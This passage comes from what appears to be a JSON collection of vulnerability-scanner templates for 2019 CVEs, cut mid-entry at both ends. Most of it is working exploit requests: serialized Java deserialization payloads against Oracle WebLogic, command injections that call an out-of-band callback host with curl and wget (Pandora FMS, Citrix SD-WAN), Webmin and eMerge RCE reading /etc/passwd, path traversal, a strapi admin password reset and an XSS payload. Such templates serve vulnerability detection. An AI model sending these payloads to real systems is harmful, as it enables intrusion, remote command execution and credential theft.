index=\"3157\"><byte>-52</byte></void><void index=\"3158\"><byte>16</byte></void><void index=\"3159\"><byte>67</byte></void><void index=\"3160\"><byte>-53</byte></void><void index=\"3161\"><byte>2</byte></void><void index=\"3162\"><byte>0</byte></void><void index=\"3163\"><byte>1</byte></void><void index=\"3164\"><byte>76</byte></void><void index=\"3165\"><byte>0</byte></void><void index=\"3166\"><byte>1</byte></void><void index=\"3167\"><byte>104</byte></void><void index=\"3168\"><byte>116</byte></void><void index=\"3169\"><byte>0</byte></void><void index=\"3170\"><byte>37</byte></void><void index=\"3171\"><byte>76</byte></void><void index=\"3172\"><byte>106</byte></void><void index=\"3173\"><byte>97</byte></void><void index=\"3174\"><byte>118</byte></void><void index=\"3175\"><byte>97</byte></void><void index=\"3176\"><byte>47</byte></void><void index=\"3177\"><byte>108</byte></void><void index=\"3178\"><byte>97</byte></void><void index=\"3179\"><byte>110</byte></void><void index=\"3180\"><byte>103</byte></void><void index=\"3181\"><byte>47</byte></void><void index=\"3182\"><byte>114</byte></void><void index=\"3183\"><byte>101</byte></void><void index=\"3184\"><byte>102</byte></void><void index=\"3185\"><byte>108</byte></void><void index=\"3186\"><byte>101</byte></void><void index=\"3187\"><byte>99</byte></void><void index=\"3188\"><byte>116</byte></void><void index=\"3189\"><byte>47</byte></void><void index=\"3190\"><byte>73</byte></void><void index=\"3191\"><byte>110</byte></void><void index=\"3192\"><byte>118</byte></void><void index=\"3193\"><byte>111</byte></void><void index=\"3194\"><byte>99</byte></void><void index=\"3195\"><byte>97</byte></void><void index=\"3196\"><byte>116</byte></void><void index=\"3197\"><byte>105</byte></void><void index=\"3198\"><byte>111</byte></void><void index=\"3199\"><byte>110</byte></void><void index=\"3200\"><byte>72</byte></void><void index=\"3201\"><byte>97</byte></void><void index=\"3202\"><byte>110</byte></void><void index=\"3203\"><byte>100</byte></void><void index=\"3204\"><byte>108</byte></void><void index=\"3205\"><byte>101</byte></void><void index=\"3206\"><byte>114</byte></void><void index=\"3207\"><byte>59</byte></void><void index=\"3208\"><byte>120</byte></void><void index=\"3209\"><byte>112</byte></void><void index=\"3210\"><byte>115</byte></void><void index=\"3211\"><byte>114</byte></void><void index=\"3212\"><byte>0</byte></void><void index=\"3213\"><byte>50</byte></void><void index=\"3214\"><byte>115</byte></void><void index=\"3215\"><byte>117</byte></void><void index=\"3216\"><byte>110</byte></void><void index=\"3217\"><byte>46</byte></void><void index=\"3218\"><byte>114</byte></void><void index=\"3219\"><byte>101</byte></void><void index=\"3220\"><byte>102</byte></void><void index=\"3221\"><byte>108</byte></void><void index=\"3222\"><byte>101</byte></void><void index=\"3223\"><byte>99</byte></void><void index=\"3224\"><byte>116</byte></void><void index=\"3225\"><byte>46</byte></void><void index=\"3226\"><byte>97</byte></void><void index=\"3227\"><byte>110</byte></void><void index=\"3228\"><byte>110</byte></void><void index=\"3229\"><byte>111</byte></void><void index=\"3230\"><byte>116</byte></void><void index=\"3231\"><byte>97</byte></void><void index=\"3232\"><byte>116</byte></void><void index=\"3233\"><byte>105</byte></void><void index=\"3234\"><byte>111</byte></void><void index=\"3235\"><byte>110</byte></void><void index=\"3236\"><byte>46</byte></void><void index=\"3237\"><byte>65</byte></void><void index=\"3238\"><byte>110</byte></void><void index=\"3239\"><byte>110</byte></void><void index=\"3240\"><byte>111</byte></void><void index=\"3241\"><byte>116</byte></void><void index=\"3242\"><byte>97</byte></void><void index=\"3243\"><byte>116</byte></void><void index=\"3244\"><byte>105</byte></void><void index=\"3245\"><byte>111</byte></void><void index=\"3246\"><byte>110</byte></void><void index=\"3247\"><byte>73</byte></void><void index=\"3248\"><byte>110</byte></void><void index=\"3249\"><byte>118</byte></void><void index=\"3250\"><byte>111</byte></void><void index=\"3251\"><byte>99</byte></void><void index=\"3252\"><byte>97</byte></void><void index=\"3253\"><byte>116</byte></void><void index=\"3254\"><byte>105</byte></void><void index=\"3255\"><byte>111</byte></void><void index=\"3256\"><byte>110</byte></void><void index=\"3257\"><byte>72</byte></void><void index=\"3258\"><byte>97</byte></void><void index=\"3259\"><byte>110</byte></void><void index=\"3260\"><byte>100</byte></void><void index=\"3261\"><byte>108</byte></void><void index=\"3262\"><byte>101</byte></void><void index=\"3263\"><byte>114</byte></void><void index=\"3264\"><byte>85</byte></void><void index=\"3265\"><byte>-54</byte></void><void index=\"3266\"><byte>-11</byte></void><void index=\"3267\"><byte>15</byte></void><void index=\"3268\"><byte>21</byte></void><void index=\"3269\"><byte>-53</byte></void><void index=\"3270\"><byte>126</byte></void><void index=\"3271\"><byte>-91</byte></void><void index=\"3272\"><byte>2</byte></void><void index=\"3273\"><byte>0</byte></void><void index=\"3274\"><byte>2</byte></void><void index=\"3275\"><byte>76</byte></void><void index=\"3276\"><byte>0</byte></void><void index=\"3277\"><byte>12</byte></void><void index=\"3278\"><byte>109</byte></void><void index=\"3279\"><byte>101</byte></void><void index=\"3280\"><byte>109</byte></void><void index=\"3281\"><byte>98</byte></void><void index=\"3282\"><byte>101</byte></void><void index=\"3283\"><byte>114</byte></void><void index=\"3284\"><byte>86</byte></void><void index=\"3285\"><byte>97</byte></void><void index=\"3286\"><byte>108</byte></void><void index=\"3287\"><byte>117</byte></void><void index=\"3288\"><byte>101</byte></void><void index=\"3289\"><byte>115</byte></void><void index=\"3290\"><byte>116</byte></void><void index=\"3291\"><byte>0</byte></void><void index=\"3292\"><byte>15</byte></void><void index=\"3293\"><byte>76</byte></void><void index=\"3294\"><byte>106</byte></void><void index=\"3295\"><byte>97</byte></void><void index=\"3296\"><byte>118</byte></void><void index=\"3297\"><byte>97</byte></void><void index=\"3298\"><byte>47</byte></void><void index=\"3299\"><byte>117</byte></void><void index=\"3300\"><byte>116</byte></void><void index=\"3301\"><byte>105</byte></void><void index=\"3302\"><byte>108</byte></void><void index=\"3303\"><byte>47</byte></void><void index=\"3304\"><byte>77</byte></void><void index=\"3305\"><byte>97</byte></void><void index=\"3306\"><byte>112</byte></void><void index=\"3307\"><byte>59</byte></void><void index=\"3308\"><byte>76</byte></void><void index=\"3309\"><byte>0</byte></void><void index=\"3310\"><byte>4</byte></void><void index=\"3311\"><byte>116</byte></void><void index=\"3312\"><byte>121</byte></void><void index=\"3313\"><byte>112</byte></void><void index=\"3314\"><byte>101</byte></void><void index=\"3315\"><byte>116</byte></void><void index=\"3316\"><byte>0</byte></void><void index=\"3317\"><byte>17</byte></void><void index=\"3318\"><byte>76</byte></void><void index=\"3319\"><byte>106</byte></void><void index=\"3320\"><byte>97</byte></void><void index=\"3321\"><byte>118</byte></void><void index=\"3322\"><byte>97</byte></void><void index=\"3323\"><byte>47</byte></void><void index=\"3324\"><byte>108</byte></void><void index=\"3325\"><byte>97</byte></void><void index=\"3326\"><byte>110</byte></void><void index=\"3327\"><byte>103</byte></void><void index=\"3328\"><byte>47</byte></void><void index=\"3329\"><byte>67</byte></void><void index=\"3330\"><byte>108</byte></void><void index=\"3331\"><byte>97</byte></void><void index=\"3332\"><byte>115</byte></void><void index=\"3333\"><byte>115</byte></void><void index=\"3334\"><byte>59</byte></void><void index=\"3335\"><byte>120</byte></void><void index=\"3336\"><byte>112</byte></void><void index=\"3337\"><byte>115</byte></void><void index=\"3338\"><byte>114</byte></void><void index=\"3339\"><byte>0</byte></void><void index=\"3340\"><byte>17</byte></void><void index=\"3341\"><byte>106</byte></void><void index=\"3342\"><byte>97</byte></void><void index=\"3343\"><byte>118</byte></void><void index=\"3344\"><byte>97</byte></void><void index=\"3345\"><byte>46</byte></void><void index=\"3346\"><byte>117</byte></void><void index=\"3347\"><byte>116</byte></void><void index=\"3348\"><byte>105</byte></void><void index=\"3349\"><byte>108</byte></void><void index=\"3350\"><byte>46</byte></void><void index=\"3351\"><byte>72</byte></void><void index=\"3352\"><byte>97</byte></void><void index=\"3353\"><byte>115</byte></void><void index=\"3354\"><byte>104</byte></void><void index=\"3355\"><byte>77</byte></void><void index=\"3356\"><byte>97</byte></void><void index=\"3357\"><byte>112</byte></void><void index=\"3358\"><byte>5</byte></void><void index=\"3359\"><byte>7</byte></void><void index=\"3360\"><byte>-38</byte></void><void index=\"3361\"><byte>-63</byte></void><void index=\"3362\"><byte>-61</byte></void><void index=\"3363\"><byte>22</byte></void><void index=\"3364\"><byte>96</byte></void><void index=\"3365\"><byte>-47</byte></void><void index=\"3366\"><byte>3</byte></void><void index=\"3367\"><byte>0</byte></void><void index=\"3368\"><byte>2</byte></void><void index=\"3369\"><byte>70</byte></void><void index=\"3370\"><byte>0</byte></void><void index=\"3371\"><byte>10</byte></void><void index=\"3372\"><byte>108</byte></void><void index=\"3373\"><byte>111</byte></void><void index=\"3374\"><byte>97</byte></void><void index=\"3375\"><byte>100</byte></void><void index=\"3376\"><byte>70</byte></void><void index=\"3377\"><byte>97</byte></void><void index=\"3378\"><byte>99</byte></void><void index=\"3379\"><byte>116</byte></void><void index=\"3380\"><byte>111</byte></void><void index=\"3381\"><byte>114</byte></void><void index=\"3382\"><byte>73</byte></void><void index=\"3383\"><byte>0</byte></void><void index=\"3384\"><byte>9</byte></void><void index=\"3385\"><byte>116</byte></void><void index=\"3386\"><byte>104</byte></void><void index=\"3387\"><byte>114</byte></void><void index=\"3388\"><byte>101</byte></void><void index=\"3389\"><byte>115</byte></void><void index=\"3390\"><byte>104</byte></void><void index=\"3391\"><byte>111</byte></void><void index=\"3392\"><byte>108</byte></void><void index=\"3393\"><byte>100</byte></void><void index=\"3394\"><byte>120</byte></void><void index=\"3395\"><byte>112</byte></void><void index=\"3396\"><byte>63</byte></void><void index=\"3397\"><byte>64</byte></void><void index=\"3398\"><byte>0</byte></void><void index=\"3399\"><byte>0</byte></void><void index=\"3400\"><byte>0</byte></void><void index=\"3401\"><byte>0</byte></void><void index=\"3402\"><byte>0</byte></void><void index=\"3403\"><byte>12</byte></void><void index=\"3404\"><byte>119</byte></void><void index=\"3405\"><byte>8</byte></void><void index=\"3406\"><byte>0</byte></void><void index=\"3407\"><byte>0</byte></void><void index=\"3408\"><byte>0</byte></void><void index=\"3409\"><byte>16</byte></void><void index=\"3410\"><byte>0</byte></void><void index=\"3411\"><byte>0</byte></void><void index=\"3412\"><byte>0</byte></void><void index=\"3413\"><byte>1</byte></void><void index=\"3414\"><byte>116</byte></void><void index=\"3415\"><byte>0</byte></void><void index=\"3416\"><byte>8</byte></void><void index=\"3417\"><byte>102</byte></void><void index=\"3418\"><byte>53</byte></void><void index=\"3419\"><byte>97</byte></void><void index=\"3420\"><byte>53</byte></void><void index=\"3421\"><byte>97</byte></void><void index=\"3422\"><byte>54</byte></void><void index=\"3423\"><byte>48</byte></void><void index=\"3424\"><byte>56</byte></void><void index=\"3425\"><byte>113</byte></void><void index=\"3426\"><byte>0</byte></void><void index=\"3427\"><byte>126</byte></void><void index=\"3428\"><byte>0</byte></void><void index=\"3429\"><byte>8</byte></void><void index=\"3430\"><byte>120</byte></void><void index=\"3431\"><byte>118</byte></void><void index=\"3432\"><byte>114</byte></void><void index=\"3433\"><byte>0</byte></void><void index=\"3434\"><byte>29</byte></void><void index=\"3435\"><byte>106</byte></void><void index=\"3436\"><byte>97</byte></void><void index=\"3437\"><byte>118</byte></void><void index=\"3438\"><byte>97</byte></void><void index=\"3439\"><byte>120</byte></void><void index=\"3440\"><byte>46</byte></void><void index=\"3441\"><byte>120</byte></void><void index=\"3442\"><byte>109</byte></void><void index=\"3443\"><byte>108</byte></void><void index=\"3444\"><byte>46</byte></void><void index=\"3445\"><byte>116</byte></void><void index=\"3446\"><byte>114</byte></void><void index=\"3447\"><byte>97</byte></void><void index=\"3448\"><byte>110</byte></void><void index=\"3449\"><byte>115</byte></void><void index=\"3450\"><byte>102</byte></void><void index=\"3451\"><byte>111</byte></void><void index=\"3452\"><byte>114</byte></void><void index=\"3453\"><byte>109</byte></void><void index=\"3454\"><byte>46</byte></void><void index=\"3455\"><byte>84</byte></void><void index=\"3456\"><byte>101</byte></void><void index=\"3457\"><byte>109</byte></void><void index=\"3458\"><byte>112</byte></void><void index=\"3459\"><byte>108</byte></void><void index=\"3460\"><byte>97</byte></void><void index=\"3461\"><byte>116</byte></void><void index=\"3462\"><byte>101</byte></void><void index=\"3463\"><byte>115</byte></void><void index=\"3464\"><byte>0</byte></void><void index=\"3465\"><byte>0</byte></void><void index=\"3466\"><byte>0</byte></void><void index=\"3467\"><byte>0</byte></void><void index=\"3468\"><byte>0</byte></void><void index=\"3469\"><byte>0</byte></void><void index=\"3470\"><byte>0</byte></void><void index=\"3471\"><byte>0</byte></void><void index=\"3472\"><byte>0</byte></void><void index=\"3473\"><byte>0</byte></void><void index=\"3474\"><byte>0</byte></void><void index=\"3475\"><byte>120</byte></void><void index=\"3476\"><byte>112</byte></void><void index=\"3477\"><byte>120</byte></void></array></void></array></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n","GET /_async/favicon.ico HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"CVE-2019-2729-POC\")"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 202","contains(body_3, \"Vulnerable\")"],"condition":"and"}]}]},{"id":"CVE-2019-15501","info":{"name":"L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20224","info":{"name":"Pandora FMS 7.0NG - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /pandora_console/index.php?login=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnick=admin&pass=admin&login_button=Login\n","POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndate=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","name":"http","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12987","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://{{interactsh-url}}%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-17506","info":{"name":"D-Link DIR-868L/817LW - Information Disclosure","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</password>","DEVICE.ACCOUNT"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18818","info":{"name":"strapi CMS <3.0.0-beta.17.5 - Admin Password Reset","severity":"critical"},"requests":[{"raw":["POST /admin/auth/reset-password HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"code\": {\"$gt\": 0}, \"password\": \"SuperStrongPassword1\", \"passwordConfirmation\": \"SuperStrongPassword1\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"username\":","\"email\":","\"jwt\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".user.username",".user.email"]}]}]},{"id":"CVE-2019-12990","info":{"name":"Citrix SD-WAN Center - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfilename=../../../../../../home/talariuser/www/app/webroot/files/{{randstr}}&filedata=\n","GET /talari/app/files/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code_3 == 200","contains(body_1, \"<title>Citrix SD-WAN</title>\")"],"condition":"and"}]}]},{"id":"CVE-2019-15107","info":{"name":"Webmin <= 1.920 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /password_change.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nuser=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-18393","info":{"name":"Ignite Realtime Openfire <4.42 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/search/..\\..\\..\\conf\\openfire.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["org.jivesoftware.database.EmbeddedConnectionProvider","Most properties are stored in the Openfire database"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7256","info":{"name":"eMerge E3 1.00-06 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20{{file}}.txt%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /{{file}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15043","info":{"name":"Grafana - Improper Access Control","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/snapshots"],"body":"{\"dashboard\": {\"name\":\"{{payload}}\"}}","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":","\"key\":","\"url\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14530","info":{"name":"OpenEMR <5.0.2 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["filename=passwd"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2725","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\ncmd: id\n\n<?xml version=\"1.0\" encoding=\"utf-8\" ?><soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class=\"byte\" length=\"5010\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void index=\"118\"><byte>46</byte></void><void index=\"119\"><byte>105</byte></void><void index=\"120\"><byte>110</byte></void><void index=\"121\"><byte>116</byte></void><void index=\"122\"><byte>101</byte></void><void index=\"123\"><byte>114</byte></void><void index=\"124\"><byte>110</byte></void><void index=\"125\"><byte>97</byte></void><void index=\"126\"><byte>108</byte></void><void index=\"127\"><byte>46</byte></void><void index=\"128\"><byte>120</byte></void><void index=\"129\"><byte>115</byte></void><void index=\"130\"><byte>108</byte></void><void index=\"131\"><byte>116</byte></void><void index=\"132\"><byte>99</byte></void><void index=\"133\"><byte>46</byte></void><void index=\"134\"><byte>116</byte></void><void index=\"135\"><byte>114</byte></void><void index=\"136\"><byte>97</byte></void><void index=\"137\"><byte>120</byte></void><void index=\"138\"><byte>46</byte></void><void index=\"139\"><byte>84</byte></void><void index=\"140\"><byte>101</byte></void><void index=\"141\"><byte>109</byte></void><void index=\"142\"><byte>112</byte></void><void index=\"143\"><byte>108</byte></void><void index=\"144\"><byte>97</byte></void><void index=\"145\"><byte>116</byte></void><void index=\"146\"><byte>101</byte></void><void index=\"147\"><byte>115</byte></void><void index=\"148\"><byte>73</byte></void><void index=\"149\"><byte>109</byte></void><void index=\"150\"><byte>112</byte></void><void index=\"151\"><byte>108</byte></void><void index=\"152\"><byte>9</byte></void><void index=\"153\"><byte>87</byte></void><void index=\"154\"><byte>79</byte></void><void index=\"155\"><byte>-63</byte></void><void index=\"156\"><byte>110</byte></void><void index=\"157\"><byte>-84</byte></void><void index=\"158\"><byte>-85</byte></void><void index=\"159\"><byte>51</byte></void><void index=\"160\"><byte>3</byte></void><void index=\"161\"><byte>0</byte></void><void index=\"162\"><byte>9</byte></void><void index=\"163\"><byte>73</byte></void><void index=\"164\"><byte>0</byte></void><void index=\"165\"><byte>13</byte></void><void index=\"166\"><byte>95</byte></void><void index=\"167\"><byte>105</byte></void><void index=\"168\"><byte>110</byte></void><void index=\"169\"><byte>100</byte></void><void index=\"170\"><byte>101</byte></void><void index=\"171\"><byte>110</byte></void><void index=\"172\"><byte>116</byte></void><void index=\"173\"><byte>78</byte></void><void index=\"174\"><byte>117</byte></void><void index=\"175\"><byte>109</byte></void><void index=\"176\"><byte>98</byte></void><void index=\"177\"><byte>101</byte></void><void index=\"178\"><byte>114</byte></void><void index=\"179\"><byte>73</byte></void><void index=\"180\"><byte>0</byte></void><void index=\"181\"><byte>14</byte></void><void index=\"182\"><byte>95</byte></void><void index=\"183\"><byte>116</byte></void><void index=\"184\"><byte>114</byte></void><void index=\"185\"><byte>97</byte></void><void index=\"186\"><byte>110</byte></void><void index=\"187\"><byte>115</byte></void><void index=\"188\"><byte>108</byte></void><void index=\"189\"><byte>101</byte></void><void index=\"190\"><byte>116</byte></void><void index=\"191\"><byte>73</byte></void><void index=\"192\"><byte>110</byte></void><void index=\"193\"><byte>100</byte></void><void index=\"194\"><byte>101</byte></void><void index=\"195\"><byte>120</byte></void><void index=\"196\"><byte>90</byte></void><void index=\"197\"><byte>0</byte></void><void index=\"198\"><byte>21</byte></void><void index=\"199\"><byte>95</byte></void><void index=\"200\"><byte>117</byte></void><void index=\"201\"><byte>115</byte></void><void index=\"202\"><byte>101</byte></void><void index=\"203\"><byte>83</byte></void><void index=\"204\"><byte>101</byte></void><void index=\"205\"><byte>114</byte></void><void index=\"206\"><byte>118</byte></void><void index=\"207\"><byte>105</byte></void><void index=\"208\"><byte>99</byte></void><void index=\"209\"><byte>101</byte></void><void index=\"210\"><byte>115</byte></void><void index=\"211\"><byte>77</byte></void><void index=\"212\"><byte>101</byte></void><void index=\"213\"><byte>99</byte></void><void index=\"214\"><byte>104</byte></void><void index=\"215\"><byte>97</byte></void><void index=\"216\"><byte>110</byte></void><void index=\"217\"><byte>105</byte></void><void index=\"218\"><byte>115</byte></void><void index=\"219\"><byte>109</byte></void><void index=\"220\"><byte>76</byte></void><void index=\"221\"><byte>0</byte></void><void index=\"222\"><byte>25</byte></void><void index=\"223\"><byte>95</byte></void><void index=\"224\"><byte>97</byte></void><void index=\"225\"><byte>99</byte></void><void index=\"226\"><byte>99</byte></void><void index=\"227\"><byte>101</byte></void><void index=\"228\"><byte>115</byte></void><void index=\"229\"><byte>115</byte></void><void index=\"230\"><byte>69</byte></void><void index=\"231\"><byte>120</byte></void><void index=\"232\"><byte>116</byte></void><void index=\"233\"><byte>101</byte></void><void index=\"234\"><byte>114</byte></void><void index=\"235\"><byte>110</byte></void><void index=\"236\"><byte>97</byte></void><void index=\"237\"><byte>108</byte></void><void index=\"238\"><byte>83</byte></void><void index=\"239\"><byte>116</byte></void><void index=\"240\"><byte>121</byte></void><void index=\"241\"><byte>108</byte></void><void index=\"242\"><byte>101</byte></void><void index=\"243\"><byte>115</byte></void><void index=\"244\"><byte>104</byte></void><void 